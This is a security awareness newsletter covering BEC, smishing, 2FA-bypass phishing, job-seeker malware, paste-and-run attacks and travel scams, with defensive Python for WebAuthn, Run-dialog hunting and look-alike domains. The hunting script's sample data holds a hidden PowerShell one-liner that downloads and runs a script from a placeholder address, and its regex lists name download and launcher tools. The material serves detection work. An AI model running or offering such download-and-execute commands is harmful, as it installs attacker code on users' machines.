Security Awareness Newsletter June 2024
Getting this out a little late. This is a newsletter that I put together for our internal security awareness program. Feel free to grab and use within your own security awareness program. Created with help from ChatGPT.
Rising Threat of Business Email Compromise (BEC) Scams
The FBI’s Internet Crime Complaint Center (IC3) has warned about the growing threat of Business Email Compromise (BEC) scams targeting businesses and individuals to steal money through fraudulent emails.
Key Points:
What is BEC? Cybercriminals compromise a real business mailbox, or spoof one with a look-alike address, and use it to trick victims into wiring money or revealing sensitive information. The request usually arrives as an ordinary-looking email from a boss, vendor, or partner.
Scam Tactics:
Phishing: Credential-harvesting emails used to take over business email accounts.
Spoofing: Forged or look-alike sender addresses (a swapped letter, an extra word, a different top-level domain) that mimic a legitimate one.
Impersonation: Posing as executives, suppliers, or trusted partners, often with an urgent request to pay an invoice or change bank details.
Recent Trends: Increased targeting of real estate, legal, and financial services with sophisticated AI-generated emails and deepfake audio.
Impact: BEC scams have caused billions in financial losses annually.
Prevention Tips:
Verify any fund transfer request, and any change to a payee's bank details, through a separate channel (for example, a phone call to a number you already have on file), never by replying to the email or calling a number it contains.
Educate employees on phishing and suspicious activities.
Use multi-factor authentication (MFA).
Monitor accounts for unusual activities.
Report suspected scams to the IC3 at www.ic3.gov.
Stay vigilant and protect your organization from BEC scams. For more details, visit the full PSA on the IC3 website: FBI IC3 PSA.
Arrests Made in Smishing Text Scam
The City of London Police has announced the arrest of two individuals connected to a sophisticated smishing campaign using a homemade mobile antenna. This operation involved sending thousands of fraudulent text messages to the public, aiming to steal personal and financial information.
Key Details:
Smishing Explained: Smishing (SMS phishing) involves sending text messages that appear to be from reputable sources, urging recipients to provide personal information, click on malicious links, or download harmful software.
How the Scam Worked: The arrested individuals used a homemade mobile antenna to send out mass smishing texts, tricking victims into sharing sensitive data.
Impact: Thousands of people received these fraudulent messages, potentially leading to significant personal and financial losses.
Protect Yourself:
Be Skeptical of Unexpected Texts: Do not click on links or provide personal information in response to unsolicited text messages.
Verify Sources: If you receive a suspicious message claiming to be from a legitimate organization, contact the organization directly using official contact information.
Report Suspicious Messages: Forward suspicious texts to your mobile carrier’s spam reporting service or report them to relevant authorities.
Stay Informed and Safe: For more details on this case and tips to protect yourself from smishing attacks, visit the City of London Police website: City of London Police Smishing Arrests.
Stay vigilant and keep your personal information secure!
Phishing Tactics Targeting Two-Factor Authentication (2FA)
Recent reports from Kaspersky highlight an emerging phishing technique targeting Two-Factor Authentication (2FA) mechanisms, increasing the risk of account compromise even for those using this added layer of security.
Key Findings:
Phishing Techniques: Cybercriminals are evolving their tactics to bypass 2FA, employing sophisticated methods such as phishing bots and transparent phishing pages to deceive users.
OTP Bots: Attackers use bots to automate the process of extracting One-Time Passwords (OTPs) from victims. The attacker already holds the victim's stolen username and password; when they log in and the real service sends an OTP, the bot phones or texts the victim posing as that bank or service and asks them to read the code back, typically "to block a suspicious login". The code is then entered on the attacker's side before it expires.
How It Works:
Phishing Bots: These bots send automated calls or messages posing as legitimate services, tricking users into revealing their OTPs.
Transparent Phishing: The attacker's site is a reverse proxy in front of the real login page, so the victim sees the genuine pages, branding, and flow. Everything typed, including the credentials and the OTP, is relayed to the real site immediately, before the OTP expires, and the session cookie the real site returns is captured. The attacker then uses that cookie and never has to enter a second code.
Prevention Tips:
Verify Requests: Always verify the legitimacy of any request for personal information or OTPs by contacting the organization directly using known contact details.
Educate Employees: Regularly train employees to recognize phishing attempts and the latest tactics used by cybercriminals.
Use Phishing-Resistant MFA: Prefer FIDO2/WebAuthn methods such as hardware security keys or passkeys. The authenticator's response is bound to the web origin the browser is actually on, so a response produced on a look-alike or proxy domain is rejected by the real site. SMS and app-generated codes can be relayed; a security key response cannot.
Stay Vigilant: Phishing attacks continue to grow in sophistication and now defeat the most common forms of 2FA. Staying informed and moving to phishing-resistant methods where you can protects you and your organization from these evolving threats.
For more detailed information, visit the full article on Kaspersky's blog: Phishing with Cloudflare Workers: Transparent Phishing and HTML Smuggling.
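To make the difference between a relayable OTP and an origin-bound WebAuthn response concrete, here is an added Python illustration (not from the Kaspersky article or any vendor's code). It models both checks server-side: the OTP check only compares digits, so a code typed into the proxy and forwarded is accepted, while the WebAuthn-style check rejects an assertion whose clientDataJSON names the proxy's origin, and also rejects one where the proxy rewrites the origin, because the signature covers it. The origins login.example.com and login.example-secure.net, the OTP seed, and the use of an HMAC in place of the credential's public-key signature are assumptions made for the illustration.

```python
import hashlib
import hmac
import json
import os
import time

# Origins are assumptions for the illustration.
RP_ORIGIN = "https://login.example.com"            # the real login page
PROXY_ORIGIN = "https://login.example-secure.net"  # attacker's transparent proxy

# ---- OTP path (simplified TOTP; not byte-exact RFC 6238) -------------------
OTP_SEED = b"seed shared with the user's authenticator app"  # assumed value

def current_otp(seed: bytes, now: int) -> str:
    """Six-digit code for the current 30-second window."""
    mac = hmac.new(seed, (now // 30).to_bytes(8, "big"), hashlib.sha1).digest()
    return f"{int.from_bytes(mac[-4:], 'big') % 1_000_000:06d}"

def server_checks_otp(submitted: str, now: int) -> bool:
    # The server cannot tell WHERE the code was typed: a code relayed by a proxy
    # inside the validity window is indistinguishable from one typed on the real page.
    return hmac.compare_digest(submitted, current_otp(OTP_SEED, now))

def otp_survives_proxy(now=None) -> bool:
    now = int(time.time()) if now is None else now
    typed_into_phishing_page = current_otp(OTP_SEED, now)   # victim reads it off their app
    return server_checks_otp(typed_into_phishing_page, now)  # proxy forwards it: accepted

# ---- WebAuthn path -----------------------------------------------------------
# Real WebAuthn: the authenticator signs authenticatorData || SHA-256(clientDataJSON)
# with the credential's private key.  clientDataJSON is written by the BROWSER and
# carries the origin of the page that called navigator.credentials.get(); a phishing
# page cannot change it.  HMAC over a private secret stands in for the public-key
# signature so this file runs without a crypto library (a simplification).
CREDENTIAL_KEY = os.urandom(32)

def authenticator_sign(challenge: bytes, browser_origin: str) -> dict:
    client_data = json.dumps(
        {"type": "webauthn.get", "challenge": challenge.hex(), "origin": browser_origin},
        sort_keys=True,
    ).encode()
    signature = hmac.new(CREDENTIAL_KEY, hashlib.sha256(client_data).digest(), hashlib.sha256).digest()
    return {"clientDataJSON": client_data, "signature": signature}

def rp_verify(assertion: dict, expected_challenge: bytes) -> bool:
    """Checks the relying party performs before accepting a login."""
    client_data = json.loads(assertion["clientDataJSON"])
    if client_data.get("type") != "webauthn.get":
        return False
    if client_data.get("origin") != RP_ORIGIN:                    # origin binding
        return False
    if client_data.get("challenge") != expected_challenge.hex():  # freshness, no replay
        return False
    expected_sig = hmac.new(CREDENTIAL_KEY, hashlib.sha256(assertion["clientDataJSON"]).digest(),
                            hashlib.sha256).digest()
    return hmac.compare_digest(expected_sig, assertion["signature"])

def webauthn_direct() -> bool:
    challenge = os.urandom(32)
    return rp_verify(authenticator_sign(challenge, RP_ORIGIN), challenge)  # True

def webauthn_through_proxy() -> bool:
    challenge = os.urandom(32)                               # issued by the RP, forwarded unchanged
    assertion = authenticator_sign(challenge, PROXY_ORIGIN)  # browser is on the proxy's domain
    return rp_verify(assertion, challenge)                   # False: origin mismatch

def webauthn_proxy_rewrites_origin() -> bool:
    """The proxy patches the origin field in clientDataJSON before forwarding."""
    challenge = os.urandom(32)
    assertion = authenticator_sign(challenge, PROXY_ORIGIN)
    forged = json.loads(assertion["clientDataJSON"])
    forged["origin"] = RP_ORIGIN
    assertion["clientDataJSON"] = json.dumps(forged, sort_keys=True).encode()
    return rp_verify(assertion, challenge)                   # False: signature no longer matches

if __name__ == "__main__":
    print("OTP relayed through proxy accepted:", otp_survives_proxy())
    print("WebAuthn direct:", webauthn_direct())
    print("WebAuthn through proxy:", webauthn_through_proxy())
    print("WebAuthn with origin rewritten by proxy:", webauthn_proxy_rewrites_origin())
```

The point the OTP path makes is that "a second factor" is not the same as "a phishing-resistant factor": nothing in the code the user types encodes where they typed it. In the WebAuthn path the browser, not the page, fills in the origin, and the signature covers it, so neither relaying nor rewriting gets the proxy a valid login.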
FTC’s Spring Scam Roundup
The FTC’s latest report highlights prevalent scams and their impact on consumers this spring.
Key Findings:
Most Impersonated Companies:
Best Buy’s Geek Squad
Amazon
PayPal
Microsoft (highest reported losses)
Publishers Clearing House
Common Contact Methods:
Email and phone calls dominate.
Social media scams, especially on Facebook and Instagram, result in the highest losses.
Payment Methods:
Investment scams use cryptocurrency and bank transfers.
Gift cards are common in romance, tech support, and government impersonation scams.
Protection Tips:
Verify Requests: Always verify unexpected requests for money or personal information by contacting the source directly.
Avoid Clicking Suspicious Links: Do not respond to unsolicited messages.
Use Secure Payment Methods: Avoid using gift cards, cryptocurrency, or payment apps for urgent payments.
Stay Vigilant: Scams continue to evolve, posing significant risks. By staying informed and following these security tips, you can better protect yourself and your organization.
For more details, visit the FTC’s Spring Scam Roundup.
Stay safe and secure!
Beware of New Phishing Campaign Targeting Job Seekers
A recent phishing campaign has been discovered deploying the WARMCOOKIE backdoor, specifically targeting job seekers. Cybercriminals are using fake job offers to lure victims into opening malicious attachments or clicking on harmful links. Once activated, the WARMCOOKIE backdoor allows attackers to gain unauthorized access to the victim's system, compromising sensitive information.
Key Points:
Be cautious of unsolicited job offers.
Avoid opening attachments or clicking links from unknown sources.
Verify the legitimacy of job offers through official company channels.
Stay vigilant and protect your personal information!
For more details, visit the Hacker News article.
CISA Warns of Criminals Impersonating Its Employees
The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about criminals impersonating its employees in phone calls. These scammers attempt to deceive victims into transferring money by posing as CISA representatives.
Key Points:
CISA employees will never request money transfers, cryptocurrencies, or gift cards.
Do not comply with demands for secrecy.
Report suspicious calls to CISA at 844-729-2472 or to law enforcement.
Impersonation Scams on the Rise: Last year, impersonation scams resulted in losses of $1.1 billion, highlighting the growing threat and the need for increased vigilance. Scammers even posed as FTC staff.
“The FBI's 2023 Internet Crime Report revealed a 22% increase in reported losses to online crime compared to 2022, totaling a record $12.5 billion.”
Tips to Protect Yourself:
Verify the caller's identity through official channels.
Never share personal or financial information over the phone.
For more details, visit the Bleeping Computer article.
Beware of Fraudulent Olympics Ticketing Websites
Recently, Proofpoint uncovered fraudulent websites claiming to sell tickets for the Paris 2024 Summer Olympics. Notably, “paris24tickets[.]com” appeared as a top search result on Google. This site, designed to mimic legitimate ticketing platforms, aimed to steal money and personal information.
Key Findings
Multiple Fraudulent Sites: 338 fake Olympics ticketing websites have been identified, 51 of which have been shut down.
Phishing Tactics: Some sites used search ads, while others used email campaigns offering “discounts.”
Safety Tips: Only purchase tickets through the official Paris 2024 ticketing website.
Stay Safe
Verify the URL before purchasing; the official Paris 2024 ticketing site is the only legitimate source.
Avoid clicking sponsored search results for tickets and type the official address yourself, since fraudulent sites buy their way to the top of the results.
Be cautious of unsolicited emails offering deals on tickets; offers that seem too good to be true likely are.
Report suspicious websites to authorities.
Stay vigilant and share this information to help others avoid scams. For more details, visit the full article.
Social Engineering Scams via Mail
Social engineering scams aren't limited to digital channels; they can come through the mail too. KnowBe4 highlights a recent case where scammers sent fake refund checks by post, tricking recipients into depositing them and sending a portion of the funds back. The checks look real, and the bank usually makes the money available before the check has actually cleared. Days later the check bounces, the bank reverses the deposit, and the victim is left out of pocket for whatever they already sent back.
Protection Tips:
Be skeptical of unexpected checks and financial requests.
Verify the legitimacy of any communication by contacting the company directly.
Educate yourself and others about recognizing various social engineering tactics.
For more details, visit KnowBe4's blog.
Beware of More_eggs Malware Targeting Hiring Managers
Attention Hiring Managers:
A new phishing campaign is using fake resume submissions to distribute the More_eggs malware. Cybercriminals respond to job listings on platforms like LinkedIn and direct recruiters to websites they control, where downloading what is presented as a resume triggers the infection. This backdoor can steal sensitive data, deliver additional malicious payloads, and grant remote access to attackers.
Key Recommendations:
Always verify the source of resumes and job applications, and be wary of "resumes" that arrive as executables, scripts, shortcut files, or archives rather than as a PDF or document.
Scan all downloads with reliable antivirus software, and open candidate files on a system where macros and scripts cannot run unchecked.
Provide regular security awareness training to all staff, including HR personnel.
Stay vigilant and protect your organization from these sophisticated attacks.
For more details, visit the KnowBe4 blog.
New Threat: "Paste and Run" Phishing
Overview
A new phishing campaign tricks users into pasting and running a malicious command from their own clipboard. Because the user, not a macro or attachment, launches the command, the lure sidesteps attachment filtering and macro blocking, and it has been used to install malware such as DarkGate on the victim's system.
Key Takeaways:
Method: A web page or email copies a command to the clipboard and instructs the user to press Win+R, paste (Ctrl+V), and press Enter, which runs a malicious PowerShell command from the Windows Run dialog.
Impact: The command typically downloads and executes a second-stage payload, installing malware and compromising the system.
Prevention: Continuous security awareness training helps users recognize the "paste this to fix the error" pattern. On managed endpoints, the Run dialog can be removed by policy, and PowerShell command-line logging gives the security team a record of what was pasted.
Stay vigilant and regularly update your security protocols. For more details, visit the KnowBe4 Blog.
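A detection check for this technique, added here as an illustration and not part of the KnowBe4 post: a paste-and-run lure leaves two traces, the Run dialog history that Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and a process-creation event in which explorer.exe spawns powershell.exe (or another launcher) with a download-and-execute command line. The script below flags both. The RunMRU entries, the Sysmon-style events, and the 203.0.113.5 URL are constructed sample data; the indicator list is a starting point, not a complete signature.

```python
import re
import sys

# Binaries a paste-and-run one-liner typically starts with.
LAUNCHERS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|rundll32|certutil|bitsadmin|curl)(\.exe)?\b", re.I)

# Traits of the command itself.  Each (regex, label) contributes one reason.
INDICATORS = [
    (re.compile(r"\s-(enc|encodedcommand|ec|e)\s", re.I), "encoded command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"\b(iwr|invoke-webrequest|invoke-restmethod|irm|downloadstring|downloadfile)\b", re.I),
     "remote download"),
    (re.compile(r"https?://", re.I), "URL in command line"),
    (re.compile(r"frombase64string", re.I), "base64 decode"),
    (re.compile(r"-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass", re.I), "profile/policy bypass"),
]

def score_command(cmd: str) -> list:
    """Reasons a command line looks like a paste-and-run payload; [] means nothing seen."""
    if not LAUNCHERS.search(cmd):
        return []
    return [label for rx, label in INDICATORS if rx.search(cmd)]

def parse_runmru(values: dict) -> list:
    """values: RunMRU value name -> data, as stored in the registry.
    MRUList lists the value names most-recent-first; each entry ends in a literal '\\1'."""
    entries = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is None:
            continue
        entries.append(data[:-2] if data.endswith("\\1") else data)
    return entries

def hunt_runmru(values: dict) -> list:
    """[(command, reasons)] for suspicious Run-dialog history entries."""
    hits = []
    for cmd in parse_runmru(values):
        reasons = score_command(cmd)
        if reasons:
            hits.append((cmd, reasons))
    return hits

def hunt_process_events(events: list) -> list:
    """[(command, reasons)] for launchers spawned by explorer.exe (Run dialog / shell)
    whose command line carries the indicators above.  Events use Sysmon Event ID 1 field names."""
    hits = []
    for ev in events:
        if not ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
            continue
        reasons = score_command(ev.get("CommandLine", ""))
        if reasons:
            hits.append((ev["CommandLine"], reasons))
    return hits

def read_live_runmru() -> dict:
    """Current user's RunMRU on a Windows host; {} elsewhere or if the key is absent."""
    if sys.platform != "win32":
        return {}
    import winreg
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:
                    break
                values[name] = data
                index += 1
    except OSError:
        pass
    return values

# Constructed sample data (not from a real incident).  The URL host is a documentation range.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "powershell -w hidden -nop -c \"iex (iwr 'http://203.0.113.5/fix.ps1' -UseBasicParsing)\"\\1",
}
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -nop -c \"iex (iwr 'http://203.0.113.5/fix.ps1' -UseBasicParsing)\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": "powershell -NoLogo -File build.ps1"},
]

if __name__ == "__main__":
    source = read_live_runmru() or SAMPLE_RUNMRU
    for cmd, reasons in hunt_runmru(source):
        print("RunMRU:", cmd, "->", ", ".join(reasons))
    for cmd, reasons in hunt_process_events(SAMPLE_EVENTS):
        print("Process:", cmd, "->", ", ".join(reasons))
```

Run on a Windows host, the script reads the live RunMRU key for the current user; elsewhere it falls back to the constructed sample. The process-event check is the one to deploy in the SIEM, since RunMRU is per user and only survives until the entry ages out; the developer's "powershell -NoLogo -File build.ps1" in the sample shows why the parent-process and indicator conditions are combined rather than alerting on every PowerShell launch.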
AI-Driven Travel Scams on the Rise
Overview
Booking.com warns that the rise of artificial intelligence (AI) is driving a significant increase in travel scams. According to Marnie Wilking, the firm's head of internet safety, there has been a 500 to 900% surge in scams over the past 18 months, particularly phishing attacks.
Key Takeaways:
Increase in Phishing: Generative AI tools like ChatGPT are being used to create highly convincing phishing emails, tricking people into handing over their financial details through fake booking links.
Targeted Platforms: Scammers often target popular sites like Booking.com and Airbnb, listing fake accommodations to scam users out of money.
Detection Challenges: AI-generated content makes scams harder to detect due to realistic images and accurate text in multiple languages.
For further details, refer to the BBC News Article.
Protect Yourself from Summer Vacation Scams
Overview
As summer approaches, the excitement of planning vacations is in full swing. However, cybercriminals are also gearing up, exploiting this time to launch scams targeting travelers. Check Point Research (CPR) has observed a significant rise in phishing scams and malicious websites related to summer vacations.
Key Takeaways:
Rise in Malicious Domains: In May 2024, CPR found that 1 in every 33 new vacation-related domains was malicious or suspicious.
Phishing Emails: Scammers are using realistic phishing emails to trick users into revealing personal information. One campaign mimicked Booking.com invoices to lure victims.
Malicious Websites: Fraudulent websites like booking-secure928[.]com and hotel-housekeeper[.]com imitate legitimate travel sites to steal login credentials.
Stay informed and vigilant to protect yourself from these evolving cyber threats. For more detailed information, visit Check Point’s blog on staying safe during summer vacations.
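Several items above turn on look-alike domains: the spoofed sender addresses in the BEC item, the fake Olympics ticketing sites, and the imitation travel domains such as booking-secure928[.]com. The Python below is an added example (not from the FBI, Proofpoint, or Check Point material) of a triage check a mail or SOC team can run over sender domains and URLs before a user acts on them. It refangs the [.] notation, reduces the host to its registrable domain, normalises common digit-for-letter substitutions, and reports whether a domain is on your allow-list, embeds or is a near miss of one of your brands, or is simply unrelated. The allow-list (example.com, booking.com), the confusable table, and the sample inputs are assumptions, and public-suffix handling is deliberately simplified to the last two labels.

```python
import unicodedata
from urllib.parse import urlsplit

# Domains your organisation actually uses or pays.  Assumed allow-list for the example.
TRUSTED = {"example.com", "booking.com"}

# Digit/letter swaps attackers rely on.  Applied only for comparison, never to the original.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("7", "t")]

def refang(ioc: str) -> str:
    """Turn 'hxxp://evil[.]com' style indicators back into a real URL or host."""
    return ioc.replace("[.]", ".").replace("hxxp", "http", 1)

def host_of(value: str) -> str:
    """Extract the host from a URL, an e-mail address, or a bare domain."""
    value = refang(value.strip())
    if "@" in value and "://" not in value:      # e-mail address: keep the domain part
        value = value.rsplit("@", 1)[1]
    if "://" in value:
        value = urlsplit(value).hostname or ""
    return value.lower().strip(".")

def registrable(host: str) -> str:
    # Simplification: last two labels.  A public-suffix list would handle co.uk etc. correctly.
    return ".".join(host.split(".")[-2:])

def normalise(label: str) -> str:
    """Fold accents to ASCII and undo common look-alike substitutions before comparing."""
    label = unicodedata.normalize("NFKD", label).encode("ascii", "ignore").decode()
    for bad, good in CONFUSABLES:
        label = label.replace(bad, good)
    return label

def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def assess(value: str) -> dict:
    """Verdict 'trusted', 'lookalike' or 'unrelated' for a URL, address or domain, with reasons."""
    host = host_of(value)
    reg = registrable(host)
    reasons = []
    if reg in TRUSTED:
        return {"host": host, "verdict": "trusted", "reasons": reasons}
    if any(ord(c) > 127 for c in host):
        reasons.append("non-ASCII characters in host (possible homoglyph)")
    label = normalise(reg.split(".")[0])
    for trusted in TRUSTED:
        brand = trusted.split(".")[0]
        if label == brand:
            reasons.append(f"label matches '{brand}' after normalisation but domain is {reg}")
        elif brand in label:
            reasons.append(f"embeds brand '{brand}'")
        elif levenshtein(label, brand) <= 2:
            reasons.append(f"within 2 edits of '{brand}'")
    return {"host": host, "verdict": "lookalike" if reasons else "unrelated", "reasons": reasons}

# Constructed sample inputs: two domains named in the Check Point item, plus invented ones.
SAMPLE_INPUTS = [
    "https://booking-secure928[.]com/login",
    "hotel-housekeeper[.]com",
    "ceo@examp1e.com",
    "https://www.booking.com/",
    "b\u03bfoking.com",          # Greek omicron in place of the first 'o'
]

def triage(values: list) -> list:
    return [(v, assess(v)["verdict"]) for v in values]

if __name__ == "__main__":
    for value in SAMPLE_INPUTS:
        result = assess(value)
        print(f"{result['verdict']:9} {result['host']}  {'; '.join(result['reasons'])}")
```

Note what the check cannot do: hotel-housekeeper[.]com comes back "unrelated" because it imitates a concept rather than a brand on the list, so a check like this covers the brand-squatting cases only. Domain registration age and whether the sender passes SPF/DKIM/DMARC for the domain it claims are the complementary signals for the rest.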